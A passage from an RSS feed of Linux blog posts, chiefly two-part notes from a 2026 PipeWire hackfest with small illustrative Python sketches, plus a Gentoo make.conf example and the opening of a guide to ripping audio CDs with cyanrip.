the software running on DSP). This would allow the &lt;code&gt;audioconvert&lt;/code&gt; to delegate some or all processing to the internal node, with fallbacks available on the CPU.&lt;/p&gt;&lt;p&gt;We would need a number of pieces to do this, including:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Some standard definition of filters and associated parameters, so different implementations could have a standard “API” to express any given filter.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The DSP block would need to expose what features it has and how they might be used. 
We could imagine extending the ALSA UCM configuration to do that.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The &lt;code&gt;audioconvert&lt;/code&gt; node would need to have a way to push down &lt;code&gt;filter-graph&lt;/code&gt; params to the internal node, and negotiate what work it is doing vs. what is being delegated&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This is a non-trivial effort, but gives us some sketch of what might be possible.&lt;/p&gt;&lt;h3&gt;More DSP features&lt;/h3&gt;&lt;p&gt;In addition to standard filters, we spoke about two topics that have come up commonly in the past.&lt;/p&gt;&lt;p&gt;The first is some way to expose the processing graph in the DSP, so PipeWire and other userspace daemons have a better view of what is happening on the DSP. With the ability to push dynamic topologies to DSP, there was some renewed interest in exposing and using the ASoC DAPM widget graph. As always, the devil is in the details.&lt;/p&gt;&lt;p&gt;The second thing that came up is speaker calibration. There is a lot of processing and tuning that goes into driving speakers on modern devices as much as possible without destroying them. Some of these are one-time parameters decided at product design time, and some of these translate to runtime parameters based on voltage and current feedback from the speaker amplifier.&lt;/p&gt;&lt;p&gt;For some systems (like Qualcomm platforms), speaker calibration might be run on each system start to perform dynamic tuning. We had some discussion of how this might tie in with the rest of the system for both determining the parameters (separate startup daemon vs. 
in-process initialisation), as well as uploading parameters to the speaker (some ALSA UCM extensions to load parameters on PCM open but before start, or preloading parameters into ALSA kernel controls and having the driver feed them in at the right point).&lt;/p&gt;&lt;h3&gt;Volume limits&lt;/h3&gt;&lt;p&gt;A way to set a limit on the maximum volume for a given device has been a common user request ([&lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/work_items/4323&quot;&gt;1&lt;/a&gt;] [&lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/work_items/5266&quot;&gt;2&lt;/a&gt;]). We discussed the possibility of creating a per-route property (with a fallback to the node, if there are no routes), which WirePlumber could manage to provide users a simple interface to control.&lt;/p&gt;&lt;p&gt;Since the hackfest, Wim has already &lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/commit/fb74ab9054cb625aeff4e271e9134b0fd0cdcfde&quot;&gt;done some work&lt;/a&gt; on this, and we need to bubble this up as a more user-accessible setting.&lt;/p&gt;&lt;h3&gt;Performance&lt;/h3&gt;&lt;p&gt;A number of performance-related topics were discussed.&lt;/p&gt;&lt;p&gt;The first was an option of a combined DSP mode, where instead of one port per channel, a node would expose one port for all the channels of the stream (but continue to run in the configured “DSP” format/rate). This would improve stream performance for non-JACK-like use-cases, especially in resource-constrained environments.&lt;/p&gt;&lt;p&gt;On the WirePlumber side, there was a discussion about using LuaJIT instead of standard Lua. 
There are some compatibility issues to be determined there (such as language version supported, etc.), but there might be some quick performance wins to be made if this is feasible.&lt;/p&gt;&lt;p&gt;There is a plan to move some of the WirePlumber core to Rust, and that might be a good time to also port over some of the more standard functionality that tends not to change from Lua to Rust (though that could happen in a Lua-&amp;gt;C transition and does not really need to wait on a Rust port).&lt;/p&gt;&lt;h3&gt;Declarative Session Management&lt;/h3&gt;&lt;p&gt;Another interesting, and broader, thread is the imperative nature of WirePlumber scripts – that is, policy decisions and associated action are often interwoven. It might be helpful to be able to make a clearer split where all policy decisions are first run, and then decisions are translated into actions at one go.&lt;/p&gt;&lt;p&gt;There are some historical choices that make this hard – for example, changing the profile of a device might create and destroy nodes, which makes it hard to be able to make decisions that are independent of the action. There were some ideas around redoing the profile concept such that all nodes are &lt;em&gt;always&lt;/em&gt; exposed, but nodes could get a new state to signal availability (and profiles that would allow availability to change). That might make a declarative system possible to implement.&lt;/p&gt;&lt;p&gt;We also discussed the possibility of a “transaction” system. Something that would allow a client to submit a set of objects (think links between nodes), and then “commit” that transaction. 
This would also help reduce the number of roundtrips between PipeWire and WirePlumber, and generally help performance.&lt;/p&gt;&lt;h3&gt;Bluetooth&lt;/h3&gt;&lt;p&gt;Being colocated with the BlueZ face-to-face meeting, we had representation from the BlueZ community, so we were able to dive into a number of topics related to Bluetooth, primarily LE Audio.&lt;/p&gt;&lt;p&gt;The first topic was Auracast, the LE Audio system for broadcast audio, allowing listeners to tune into public broadcasts in a space, or to have a device stream audio to multiple headsets concurrently for shared listening. George had a demo system showing an implementation of Auracast with PipeWire, WirePlumber and BlueZ.&lt;/p&gt;&lt;p&gt;We had some discussion of where this feature should live, and the consensus was that we would probably want a separate daemon to manage Auracast settings and loading up the appropriate nodes (either for receiving or sending) based on users’ preferences.&lt;/p&gt;&lt;p&gt;This led to a more general discussion about the current split of the Bluetooth implementation in PipeWire being SPA modules, which include streaming and some policy, and a lot more policy living inside WirePlumber. 
We could, and likely should, move all of this into higher level PipeWire modules instead, which could make these easier to work with overall.&lt;/p&gt;&lt;p&gt;There was also a discussion about the complexities of LE Audio, and the state of the current user experience with actual devices:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Device interop is not always great, as the spec is new, the BlueZ implementation is still being completed, and device implementations seem of variable quality&lt;/li&gt;&lt;li&gt;Reliable pairing/feature detection is hard, partly due to how BlueZ exposes the ability to talk to devices in Bluetooth Classic or Bluetooth LE modes&lt;/li&gt;&lt;li&gt;Pairing left/right pairs currently needs individual pairing, which does not seem to be needed by other implementations (Android for example)&lt;/li&gt;&lt;li&gt;Inter-device synchronisation might need some work as well&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;While there is much work to be done here, the pieces are coming together for first-class LE Audio support on Linux-based systems.&lt;/p&gt;&lt;h3&gt;Audio analytics&lt;/h3&gt;&lt;p&gt;We also spoke about “analytics” – using local neural networks to implement things like text-to-speech, speech-to-text, language translation, or other forms of processing.&lt;/p&gt;&lt;p&gt;These pose an interesting problem, because they look like a standard-ish audio stream on one side, but are effectively a sparse stream on the other side if we are talking about text. Even conversion between languages does not look like a standard filter, because the underlying model might consume a varying amount of data before generating an output, and the input and output lengths are not tightly correlated.&lt;/p&gt;&lt;p&gt;While it should be possible to implement such a system with PipeWire, it is not quite clear whether we &lt;em&gt;should&lt;/em&gt;. 
As the application space in this area becomes more mature, it may become clearer what the right place in the stack is for these features.&lt;/p&gt;&lt;h3&gt;Click detection and elimination&lt;/h3&gt;&lt;p&gt;We spoke about &lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/work_items/4745&quot;&gt;detecting and eliminating clicks&lt;/a&gt; at the stop or start of a stream.&lt;/p&gt;&lt;p&gt;If an application is playing back audio, and suddenly stops (i.e. feeds silence, or just nothing), then the sudden drop in the signal might cause a click to be output. If you think of the corresponding waveform as representing the physical displacement of the speaker, then the drop to zero is like a sudden brake to a halt, which isn’t possible, and manifests as a jolt that you hear as a clicky noise. The same analogy holds for resuming from a pause, but in the opposite direction.&lt;/p&gt;&lt;p&gt;The solution is usually to smooth out the end of the sound by fading out, but most applications do not do this, so this problem manifests quite clearly for most browser or application streams if you listen closely.&lt;/p&gt;&lt;p&gt;Wim described a number of experiments he has done for detecting such abrupt changes in &lt;code&gt;audioconvert&lt;/code&gt;, but he was not happy with the results. We discussed some of these approaches, and what might work as acceptable tradeoffs to capture the most common cases while still trying to respect the integrity of the signal being sent by the application.&lt;/p&gt;&lt;p&gt;(sorry about the vagueness here, I missed taking more detailed notes)&lt;/p&gt;&lt;h3&gt;Miscellanea&lt;/h3&gt;&lt;p&gt;The rest of the discussion covered disparate topics that I don’t have long form notes on:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Hardware profiles: Shipping hardware-specific configuration for PipeWire and WirePlumber is hard. 
We discussed some approaches using context properties and conditions, but this is an area that needs more work.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Data loop management: PipeWire allows splitting work across data loops so different nodes in a graph can be assigned to different threads. This is currently an all-or-nothing system, where either all nodes go to a single data loop, or every node must be manually assigned a specific data loop. There was some desire for a default data loop, to make the manual management less cumbersome.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;ACP -&amp;gt; UCM: PipeWire inherits the ALSA card profile configuration from PulseAudio, which has been helpful in making the migration path smoother on most hardware. There was always some desire to have a single configuration system (probably ALSA UCM) for all hardware. This likely needs some work on what we can express in UCM configuration, and we also need to clean up how we translate our UCM handling code (George has an &lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/issues/5027&quot;&gt;RFC for this&lt;/a&gt;).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Thanks&lt;/h3&gt;&lt;p&gt;That’s it, thank you for reading if you made it this far, and a shout out to George, Mark, and others organising the event!&lt;/p&gt;&lt;p&gt;It was great to see continued interest and so much exciting work that is yet to come. I hope to see more of the community in the next edition of the hackfest.&lt;/p&gt;&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Notes from the PipeWire Hackfest 2026: Part 1</title>
<link>https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-1/</link>
<guid isPermaLink="false">RhweEAWGa_8tdKbA3g9DKUD4Cb1ReqpHDXyLCQ==</guid>
<pubDate>Mon, 22 Jun 2026 19:16:33 +0000</pubDate>
<description>(these notes are being posted in two parts to make the length more manageable, part 2 is here)</description>
<content:encoded>&lt;div&gt;&lt;p&gt;&lt;em&gt;(these notes are being posted in two parts to make the length more manageable, &lt;a href=&quot;https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-2/&quot;&gt;part 2 is here&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The PipeWire community organised &lt;a href=&quot;https://gitlab.freedesktop.org/pipewire/pipewire/-/wikis/PipeWire-Hackfest-in-Nice---May-2026&quot;&gt;a hackfest in Nice&lt;/a&gt;, France, colocated with Embedded Recipes, the GStreamer hackfest, and a number of other events.&lt;/p&gt;
&lt;p&gt;In attendance were members of the upstream community, as well as folks interested in PipeWire from Collabora, Red Hat, Qualcomm, Stream Unlimited, Texas Instruments, and Valve. In some cases these were the same person wearing upstream and professional hats, as some of us often do! :)&lt;/p&gt;
&lt;p&gt;It was two days of fruitful and deep technical discussions, and lovely evenings hanging out in the Côte d’Azur. Shout out to &lt;a href=&quot;https://gkiagia.gr/&quot;&gt;George Kiagiadakis&lt;/a&gt; and Mark Filion for putting this together!&lt;/p&gt;
&lt;/div&gt;&lt;p&gt;
&lt;/p&gt;&lt;figure&gt;&lt;a href=&quot;https://arunraghavan.net/wp-content/uploads/nice-2026.jpg&quot;&gt;&lt;img src=&quot;https://arunraghavan.net/wp-content/uploads/nice-2026.jpg&quot; alt=&quot;A photo of the waters in Nice from a rooftop&quot; title=&quot;&quot;/&gt;&lt;/a&gt;&lt;figcaption&gt;Beautiful view of the Côte d’Azur&lt;/figcaption&gt;&lt;/figure&gt;&lt;div&gt;&lt;p&gt;The topics were disparate and can be somewhat esoteric for folks who are not familiar with the Linux audio space. I will try to strike a balance between providing context and summarising the finer details we discussed. Please feel free to write in if I missed or can expand on anything.&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Multistream nodes&lt;/h3&gt;
&lt;p&gt;A recurring topic for the last couple of years has been supporting multistream nodes. The PipeWire API currently offers a &lt;code&gt;pw_stream&lt;/code&gt; interface that can offer a node with a single input &lt;em&gt;or&lt;/em&gt; output (closer to the PulseAudio API), and the &lt;code&gt;pw_filter&lt;/code&gt; interface that provides a lower-level freeform API to individually manage ports on a node (closer to the JACK API).&lt;/p&gt;
&lt;p&gt;The stream API, while convenient, can be a bit unwieldy for realising concepts such as loopbacks and filters, because each set of inputs and outputs needs to be implemented as an individual node. If you’ve ever loaded the &lt;a href=&quot;https://docs.pipewire.org/page_module_loopback.html&quot;&gt;loopback module&lt;/a&gt;, for example, you would have noticed that there are two nodes created for each instance.&lt;/p&gt;
&lt;p&gt;Wim has created a version of the API that allows a node to provide multiple streams, which allows us to keep the conveniences of the stream API, but more easily express ideas like the loopbacks, filters, etc. Each stream is effectively a group of ports on the node, and nodes can have an arbitrary number of input and output streams.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://gitlab.freedesktop.org/wtaymans/pipewire/-/tree/filter-stream2?ref_type=heads&quot;&gt;code on the PipeWire side&lt;/a&gt; is ready. The primary idea is there will be a &lt;code&gt;PortConfig&lt;/code&gt; param per stream, and this is where the format of the stream, and other metadata expressed on port groups (which is essentially what a stream is) will live.&lt;/p&gt;
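&lt;p&gt;As a rough mental model only (this is not the actual API, and every name below is made up for illustration), a multistream node can be pictured as a node that owns several named port groups, each carrying its own format. The Python sketch shows a loopback expressed as one node with an input stream and an output stream, rather than two separate nodes. The &lt;code&gt;audio_format&lt;/code&gt; field merely stands in for the per-stream &lt;code&gt;PortConfig&lt;/code&gt; param.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
```python
from dataclasses import dataclass, field


@dataclass
class Stream:
    """A named group of ports sharing one format (hypothetical model)."""
    name: str
    direction: str      # "input" or "output"
    audio_format: str   # stand-in for the per-stream PortConfig param
    ports: list = field(default_factory=list)


@dataclass
class Node:
    """A node that may carry any number of input and output streams."""
    name: str
    streams: list = field(default_factory=list)

    def ports(self, direction):
        """Flatten the ports of every stream with the given direction."""
        return [p for s in self.streams if s.direction == direction for p in s.ports]


# One node, two streams: the shape a loopback could take with multistream nodes.
loopback = Node("loopback", [
    Stream("capture", "input", "F32 48000 Hz", ["capture_FL", "capture_FR"]),
    Stream("playback", "output", "F32 48000 Hz", ["playback_FL", "playback_FR"]),
])
input_ports = loopback.ports("input")
```
&lt;/code&gt;&lt;/pre&gt;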
&lt;p&gt;We discussed what is needed in WirePlumber to make sure the linking logic adapts to this concept, and Julian will be implementing that in the coming weeks.&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Settings&lt;/h3&gt;
&lt;p&gt;PipeWire has a generic metadata system, based on the JACK API, that stores key/type/value entries, each optionally attached to an object. WirePlumber also uses this to provide its settings system (see &lt;code&gt;wpctl settings&lt;/code&gt;), adding some key features such as a schema and persistence.&lt;/p&gt;
&lt;p&gt;We discussed that it might be nicer to have the concept of settings as a first-class citizen, and possibly even standardise some settings for desktop wide usage (such as common processing elements). There was consensus that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A new settings interface (instead of extending metadata) would make sense&lt;/li&gt;
&lt;li&gt;The API should be asynchronous, and can fail&lt;/li&gt;
&lt;li&gt;A schema for valid settings and their types could be exposed as a well-known metadata key&lt;/li&gt;
&lt;li&gt;Implementors of the interface would perform validation&lt;/li&gt;
&lt;/ul&gt;
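&lt;p&gt;To make those points a little more concrete, here is a minimal Python sketch of what “asynchronous, can fail, validated against a schema by the implementor” might look like. It is purely illustrative and was not presented at the hackfest: the &lt;code&gt;SettingsStore&lt;/code&gt; class, the &lt;code&gt;SettingsError&lt;/code&gt; exception, and the setting names are all hypothetical, not PipeWire or WirePlumber APIs.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
```python
import asyncio

# Hypothetical schema: setting name mapped to the Python type it must have.
SCHEMA = {
    "example.echo-cancel.enabled": bool,
    "example.default-rate": int,
}


class SettingsError(Exception):
    """Raised when a setting is unknown or has the wrong type."""


class SettingsStore:
    """Toy stand-in for an implementor of a settings interface."""

    def __init__(self, schema):
        self._schema = schema
        self._values = {}

    async def set(self, key, value):
        # Yield to the event loop to mimic a round trip to the implementor.
        await asyncio.sleep(0)
        expected = self._schema.get(key)
        if expected is None:
            raise SettingsError("unknown setting: " + key)
        # Exact type match, so that a bool is not accepted where an int is expected.
        if type(value) is not expected:
            raise SettingsError(key + " expects " + expected.__name__)
        self._values[key] = value

    async def get(self, key):
        await asyncio.sleep(0)
        return self._values[key]


async def demo():
    store = SettingsStore(SCHEMA)
    await store.set("example.default-rate", 48000)
    try:
        await store.set("example.default-rate", "fast")
    except SettingsError as err:
        rejected = str(err)
    return await store.get("example.default-rate"), rejected


result = asyncio.run(demo())
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The invalid write is rejected by the store rather than by the caller, and the previously accepted value stays in place.&lt;/p&gt;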
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;We spoke about the current state of security for applications using PipeWire. For context, PipeWire has a fine-grained permissions model where each client can have selective access to what objects are visible to it, and what actions it may perform. There is also a less granular system, where a “manager” application can connect to the manager socket for full access. We broadly think about restricted security for sandboxed applications (primarily Flatpak).&lt;/p&gt;
&lt;p&gt;One scenario is sandboxed PulseAudio applications getting full access via the &lt;code&gt;pipewire-pulse&lt;/code&gt; server on the host. The discussion on this concluded that there &lt;em&gt;is&lt;/em&gt; a way for &lt;code&gt;pipewire-pulse&lt;/code&gt; to forward enough security-related information from sandboxed applications for us to apply sandbox restrictions to them, and we need to make that system work.&lt;/p&gt;
&lt;p&gt;There was a discussion that it might be reasonable for our default policy to restrict all applications connecting to the regular PipeWire socket (this does not prevent malicious applications from accessing the manager socket, but helps applications not do bad things erroneously).&lt;/p&gt;
&lt;p&gt;This might be disruptive to introduce as a default change, so we might implement it via an opt-in setting so that there can be some broader testing and refinement of default permissions before flipping the switch for all users.&lt;/p&gt;
&lt;p&gt;There are a number of mechanisms related to how security context properties are relayed, and how those properties are used by WirePlumber to determine permissions. We need to document and verify the expected behaviour here.&lt;/p&gt;
&lt;h3&gt;Flatpak and Portals&lt;/h3&gt;
&lt;p&gt;Relatedly there was a discussion about how things should fit in with Flatpak, and Sebastian Wick from the Flatpak team joined us briefly on the second day.&lt;/p&gt;
&lt;p&gt;There was some discussion of making sure the PulseAudio socket is provided to the sandbox in a similar way to the PipeWire socket, such that some additional security properties can be assigned from the host in a way that the sandboxed client cannot override.&lt;/p&gt;
&lt;p&gt;We agreed that we needed the ability for applications to specify with some granularity what permissions they require (via portals), and for us to grant only that (with user intervention, if needed). Broadly this is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Playback (optionally enumeration of sinks)&lt;/li&gt;
&lt;li&gt;Capture (optionally enumeration of sources)&lt;/li&gt;
&lt;li&gt;Default visibility of only the application’s own nodes&lt;/li&gt;
&lt;/ul&gt;
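&lt;p&gt;One way to picture that model, as a sketch only: an application always sees its own nodes, and sees sinks or sources only if the corresponding enumeration permission was granted. The permission names, the node dictionaries, and the &lt;code&gt;visible_nodes&lt;/code&gt; helper below are hypothetical and do not reflect how WirePlumber or the portals actually implement this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
```python
# Hypothetical permission names mirroring the list above.
PLAYBACK = "playback"
CAPTURE = "capture"
ENUMERATE_SINKS = "enumerate-sinks"
ENUMERATE_SOURCES = "enumerate-sources"


def visible_nodes(app_id, granted, nodes):
    """Return the names of the nodes an application is allowed to see."""
    visible = []
    for node in nodes:
        if node["owner"] == app_id:
            # Default visibility: the application's own nodes.
            visible.append(node["name"])
        elif node["kind"] == "sink" and ENUMERATE_SINKS in granted:
            visible.append(node["name"])
        elif node["kind"] == "source" and ENUMERATE_SOURCES in granted:
            visible.append(node["name"])
    return visible


nodes = [
    {"name": "app-playback", "owner": "org.example.Player", "kind": "stream"},
    {"name": "speakers", "owner": "system", "kind": "sink"},
    {"name": "microphone", "owner": "system", "kind": "source"},
]

default_view = visible_nodes("org.example.Player", set(), nodes)
with_sinks = visible_nodes("org.example.Player", {PLAYBACK, ENUMERATE_SINKS}, nodes)
```
&lt;/code&gt;&lt;/pre&gt;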
&lt;p&gt;We also spoke about how we might want to associate PipeWire objects with applications. With Flatpak moving to using a cgroup for each application, this should become easier. We may also want to be able to have a way to associate a stream with a specific window (to, for example, share a window and its audio), which should be possible.&lt;/p&gt;
&lt;p&gt;It was also noted that for some classes of applications, we may want a way for users to allow some of these permissions at install time (for example, a remote desktop application asking permission on every start can be annoying). This is already possible with Flatpak manifests (which are static, but we might need to add some more options here), and there is a potential entitlement system being discussed (for server-driven overrides to be distributed for malicious applications, for example).&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Encapsulation and Collections&lt;/h3&gt;
&lt;p&gt;One topic that came up last year is the ability to encapsulate a group of nodes such that they appear as a single node to other applications in the system. This could be useful for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Collapsing all the output from an application so it appears to be providing a single stream&lt;/li&gt;
&lt;li&gt;Grouping all the filters for a sink or source node, and making it appear as a single node with all the processing hidden away&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;One piece of making such a system possible is a first-class notion of this group. Julian has an implementation of such an entity, called a “collection”. This is currently implemented on top of PipeWire metadata, but we agree that it is likely worth having an explicit PipeWire interface for this.&lt;/p&gt;
&lt;p&gt;Once that is in place, we discussed the possibility of having a smarter “proxy” node that can act as the interface that translates from the “outside” of the encapsulated region to the “inside”, so that format selection, volume changes, etc. can properly be proxied to the underlying device, for example.&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Tooling improvements&lt;/h3&gt;
&lt;p&gt;It was noted that the tools we have (such as &lt;code&gt;pw-top&lt;/code&gt; and &lt;code&gt;pw-dot&lt;/code&gt;) can make it hard to get at some information, such as negotiated formats, rates, etc. They can also be “noisy” when we have a large number of filters and loopbacks.&lt;/p&gt;
&lt;p&gt;While we did not have a concrete plan to tackle this, some of us have been playing with LLM-based tooling to generate some helper code for this sort of thing. At least my attempts have been too sloppy to share as yet, but it should be possible to get something useful with a structured approach.&lt;/p&gt;
&lt;/div&gt;&lt;div&gt;&lt;p&gt;That’s it for now. Watch this space for &lt;a href=&quot;https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-2/&quot;&gt;part 2&lt;/a&gt;!&lt;/p&gt;
&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Adventures with Tape</title>
<link>https://nickvsnetworking.com/adventures-with-tape/</link>
<guid isPermaLink="false">3Oeo2TFNdiNImvk6KOsCwUgBXeZngWkZKKBNbA==</guid>
<pubDate>Sun, 21 Jun 2026 11:25:19 +0000</pubDate>
<description>For a long time I’ve run my own backups to a portable hard drive using Duplicity / Dejavu. It’s worked really well, it’s damned slow to pull back a file I’ve accidentally deleted, or need an old version of (which I probably go back to every 6 months or so), but it’s fast to backup, … Continue reading Adventures with Tape→</description>
<content:encoded>For a long time I’ve run my own backups to a portable hard drive using Duplicity / Dejavu. It’s worked really well, it’s damned slow to pull back a file I’ve accidentally deleted, or need an old version of (which I probably go back to every 6 months or so), but it’s fast to backup, … &lt;a href=&quot;https://nickvsnetworking.com/adventures-with-tape/&quot;&gt;Continue reading &lt;span&gt;Adventures with Tape&lt;/span&gt;&lt;span&gt;→&lt;/span&gt;&lt;/a&gt;</content:encoded>
</item>
<item>
<title>Gentoo make.conf example file</title>
<link>https://daulton.ca/2018/08/gentoo-make-conf/</link>
<guid isPermaLink="false">y4XEKmAnrUOCAwsJmPdtQlBLalpPjzrZVklRZQ==</guid>
<pubDate>Sun, 21 Jun 2026 01:01:25 +0000</pubDate>
<description>Gentoo make.conf example file</description>
<content:encoded>&lt;p&gt;This is my current &lt;a href=&quot;https://wiki.gentoo.org/wiki//etc/portage/make.conf&quot;&gt;make.conf&lt;/a&gt;, which I am sharing for reference.&lt;/p&gt;&lt;p&gt;Please do not copy it directly: the global USE flags, VIDEO_CARDS, and CPU_FLAGS_X86 likely would not suit your installation or supported CPU extensions. You will want to customize those, as well as FEATURES, to your needs and liking.&lt;/p&gt;&lt;pre&gt;&lt;code&gt;# Please consult /usr/share/portage/config/make.conf.example for a more detailed example.

CFLAGS=&amp;quot;-O2 -pipe -march=native&amp;quot;
CXXFLAGS=&amp;quot;${CFLAGS}&amp;quot;

# WARNING: Changing your CHOST is not something that should be done lightly.
# Please consult http://www.gentoo.org/doc/en/change-chost.xml before changing.
CHOST=&amp;quot;x86_64-pc-linux-gnu&amp;quot;

# Use the &amp;#39;stable&amp;#39; branch - &amp;#39;testing&amp;#39; no longer required for Gnome 3.
ACCEPT_KEYWORDS=&amp;quot;amd64&amp;quot;

# USE flags
# These are global; change them to suit your desired configuration, and read the wiki for your window manager or desktop
# environment, since specific USE flags may be recommended, as is the case for XFCE.
# These are for a KDE system on a hardened profile.
USE=&amp;quot;branding bindist ipv6 consolekit gpm mtp opengl X dbus -modemmanager jpeg \
lock session startup-notification -wireless udev -gnome -systemd -minimal alsa semantic-desktop phonon \
exif glamor qt3support mtp infinality pam tcpd ssl spell flac vorbis cups xinerama xscreensaver \
truetype infinality xcb udisks upower egl policykit png pdf mp3 x264 mng tiff xml ogg pngsdl \
-wifi -handbook -mysql lcms xcomposite libnotify qml kipi custom-cflags custom-optimization \
gtk gtk2 qt5 -qt4 kde -cups networkmanager&amp;quot;

# Video cards for X11 drivers
# https://wiki.gentoo.org/wiki/Template:VIDEO_CARDS
# Additionally check out the wiki page for your vendor&amp;#39;s video cards
VIDEO_CARDS=&amp;quot;radeon radeonsi vesa fbdev&amp;quot;

# Input devices for Xorg
# If you have a touch pad add &amp;#39;synaptics&amp;#39;
INPUT_DEVICES=&amp;quot;evdev keyboard mouse&amp;quot;

# Make concurrency level
# -j should usually be the total number of cores/threads minus 1, so a system with 8 cores/threads might have 7 here
MAKEOPTS=&amp;quot;-j7 -l8&amp;quot;

# Supported CPU flags to be used for USE
# Use app-portage/cpuid2cpuflags to find your CPU&amp;#39;s supported flags and then put them here. Then recompile packages that have
# support for those new CPU flags: emerge --ask --changed-use --deep @world
CPU_FLAGS_X86=&amp;quot;mmx mmxext sse sse2 sse3 ssse3&amp;quot;

# Gentoo mirrors
# Change these to mirrors near you: https://gentoo.org/downloads/mirrors/
GENTOO_MIRRORS=&amp;quot;rsync://rsync.gtlib.gatech.edu/gentoo ftp://gentoo.netnitco.net/pub/mirrors/gentoo/source/ \
rsync://gentoo.cs.uni.edu/gentoo-distfiles&amp;quot;

# FEATURES defines actions portage takes by default. This is an incremental
# variable. See the make.conf(5) man page for a complete list of supported
# values and their respective meanings. 

# For the webrsync-gpg feature, additional configuration is required outside of make.conf
# https://wiki.gentoo.org/wiki/Sakaki%27s_EFI_Install_Guide/Using_Your_New_Gentoo_System#Switching_to_emerge-webrsync_for_Security_.28Optional.29

FEATURES=&amp;quot;webrsync-gpg sandbox sign userpriv usersandbox sfperms userfetch strict parallel-fetch&amp;quot;

# If the ccache feature is enabled, leave this
# CCACHE_SIZE=&amp;quot;2G&amp;quot;

# This will install the keyring to the /var/lib/gentoo/gkeys/keyrings/gentoo/release 
# location. 
PORTAGE_GPG_DIR=&amp;quot;/var/lib/gentoo/gkeys/keyrings/gentoo/release&amp;quot;

# Disable &amp;#39;emerge --sync&amp;#39; so emerge-webrsync has to be used
SYNC=&amp;quot;&amp;quot;

# EMERGE_DEFAULT_OPTS allows emerge to act as if certain options are specified on every run.
# Useful options include --ask, --verbose, --usepkg and many others. Options that are not
# useful, such as --help, are not filtered. 
EMERGE_DEFAULT_OPTS=&amp;quot;--quiet-build=y --keep-going --jobs=8 --load-average=8&amp;quot;

# Languages for localization; for reference, see the link below
# https://wiki.gentoo.org/wiki//etc/portage/make.conf#LINGUAS
LINGUAS=&amp;quot;en en_US en_GB&amp;quot;
L10N=&amp;quot;en en-US en-GB&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;After making changes to INPUT_DEVICES, VIDEO_CARDS, USE, etc., you should update the system using the following command so the changes take effect:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;emerge --ask --changed-use --deep @world&lt;/code&gt;&lt;/pre&gt;</content:encoded>
</item>
<item>
<title>Ripping Audio CDs on Linux with cyanrip</title>
<link>https://frunc.de/how-to/audio-cds-rippen-linux-cyanrip/</link>
<enclosure type="image/jpeg" length="0" url="https://frunc.de/wp-content/uploads/2026/06/cd-stapel-640x464.jpg"></enclosure>
<guid isPermaLink="false">K_M7wicEeRvtZpWCBZFXxOqrk1Q5f1oW4UF9GA==</guid>
<pubDate>Sat, 20 Jun 2026 14:10:34 +0000</pubDate>
<description>A guide to quickly and easily ripping audio CDs on Linux with cyanrip and converting them to FLAC or MP3.</description>
<content:encoded>&lt;p&gt;A guide to quickly and easily &lt;strong&gt;ripping audio CDs&lt;/strong&gt; on Linux with cyanrip and &lt;strong&gt;converting them to FLAC or MP3&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;I find browsing the CD sections of second-hand stores enormously enjoyable. Once home, I naturally convert the treasures I pick up into FLAC files right away; one is not a digital native and data hoarder for nothing. The files then end up on my Navidrome server, which I can reach from anywhere via web browser and app.&lt;/p&gt;&lt;p&gt;After my recent OS switch, it took me a while to find a robust workflow for ripping CDs on Linux. I am sketching it out here in case it helps someone. &lt;del&gt;It will certainly help me when I have forgotten how it works again in two weeks.&lt;/del&gt;&lt;/p&gt;&lt;h2&gt;Installing cyanrip&lt;/h2&gt;&lt;p&gt;For ripping I use the command-line tool &lt;a href=&quot;https://github.com/cyanreg/cyanrip&quot;&gt;cyanrip&lt;/a&gt;. It is fast and lean, and is also said to tolerate errors on scratched CDs about as well as the godlike &lt;abbr&gt;EAC&lt;/abbr&gt; on Windows.&lt;/p&gt;&lt;p&gt;On CachyOS, Arch, and Arch derivatives, cyanrip can be installed with&lt;/p&gt;&lt;pre&gt;&lt;code&gt;yay -S cyanrip&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;On Ubuntu, Mint, and other Debian derivatives, enter&lt;/p&gt;&lt;pre&gt;&lt;code&gt;apt install cyanrip&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;in the console. 
